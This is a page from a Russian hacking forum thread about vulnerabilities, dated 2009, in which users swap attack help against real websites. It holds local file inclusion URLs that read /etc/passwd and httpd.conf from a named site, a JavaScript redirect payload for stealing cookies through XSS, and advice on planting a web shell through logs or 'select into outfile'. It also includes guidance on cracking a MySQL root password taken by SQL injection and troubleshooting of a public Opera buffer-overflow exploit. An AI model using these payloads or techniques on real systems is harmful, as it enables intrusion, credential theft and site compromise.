HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 802 из 2438 « Первая < 302702752792 798 799 800 801 802 803 804 805 806 81285290213021802 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8011  
Старый 08.07.2009, 11:19
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
Цитата:
Сообщение от Ctacok  
Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
>>Вааще если GET то врядтле ограничят.
бред
PHP код:
<?php
if($_GET['hehe'] and strlen($_GET['hehe'])<16)
{
echo 'ok';
}else{
exit;
}
?>
>>А если через POST то в инпуте есть ограничение.
<input type=text name="rate" size=12 maxlength=8>
ГЕТ или ПОСТ все равно будет ограничение

>>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
сам понял что написал?
 
Ответить с цитированием

  #8012  
Старый 08.07.2009, 11:19
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами: 8941129

Репутация: 7
По умолчанию
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
 
Ответить с цитированием

  #8013  
Старый 08.07.2009, 11:22
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
Цитата:
Сообщение от Damned_one  
Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже
<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>
 
Ответить с цитированием

  #8014  
Старый 08.07.2009, 11:24
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
Цитата:
Сообщение от farpost  
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #8015  
Старый 08.07.2009, 11:46
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
farpost, nub-hacker, 1. Ищите логи и пробуйте залить шелл через них. 2. Пробуйте через сессии.
 
Ответить с цитированием

  #8016  
Старый 08.07.2009, 11:57
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Цитата:
Сообщение от nub-hacker  
Где можно про сессии почитать на ачате. зы кроме логов шелл больше не льётся?
Ну неужели так трудно зайти в поиск?
http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #8017  
Старый 08.07.2009, 12:41
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами: 8941129

Репутация: 7
По умолчанию
Цитата:
Сообщение от Tigger  
DocumentRoot... Вот он "/var/www/html"...
Внизу есть вот это

Цитата:
<VirtualHost *:80>
ServerName localhost
DocumentRoot "/var/www/html"
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>
По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются
 
Ответить с цитированием

  #8018  
Старый 08.07.2009, 13:08
AHMED HASSAN
Новичок
Регистрация: 25.04.2007
Сообщений: 16
С нами: 10023542

Репутация: 1
По умолчанию
Hi all greets to ur amazing job here

sorry fo my english

but i need help with this

now i got into site with sql inj and mysql.user table

1-got root and pass

what is the way to decrypt it?

2- i got access to load_file works but i cant find my way on the server

by load_file() doesnt got me any error

load_file(etc/passwd) works good

is there is any way to deal with this ????????


thanx to u all
 
Ответить с цитированием

  #8019  
Старый 08.07.2009, 13:24
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию
Hello,
Цитата:
Сообщение от AHMED HASSAN  
Hi all greets to ur amazing job here

sorry fo my english

but i need help with this

now i got into site with sql inj and mysql.user table

1-got root and pass

what is the way to decrypt it?
To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
but under some circumbstances you won't need a mysql root password.
If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.
Цитата:
2- i got access to load_file works but i cant find my way on the server

by load_file() doesnt got me any error

load_file(etc/passwd) works good

is there is any way to deal with this ????????
FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).
 
Ответить с цитированием

  #8020  
Старый 08.07.2009, 14:31
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию
Сплоет заточен под Оперу. 9.63.
http://milw0rm.com/exploits/7135

Пытаюсь запустить через виртуалку.
Система Windows XP. Service Pack 3.
Браузер Opera 9.24

Эксплоит должен вызывать калькулятор после перезаполнение буфера.
Но никак не могу разобратся с вызовом удаленного кода(калькулятор).

Он должен запускаться со стороны клиента, или со стороны сервера?
Код:
var evil = "file://";
- пуста по умолчанию.
Пытался выполнить как
Код:
var evil = "http://test.test./cals.exe";
и
Код:
var evil = "file://cals.exe";
- да толку ноль.
 
Ответить с цитированием
Ответ
Страница 802 из 2438 « Первая < 302702752792 798 799 800 801 802 803 804 805 806 81285290213021802 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.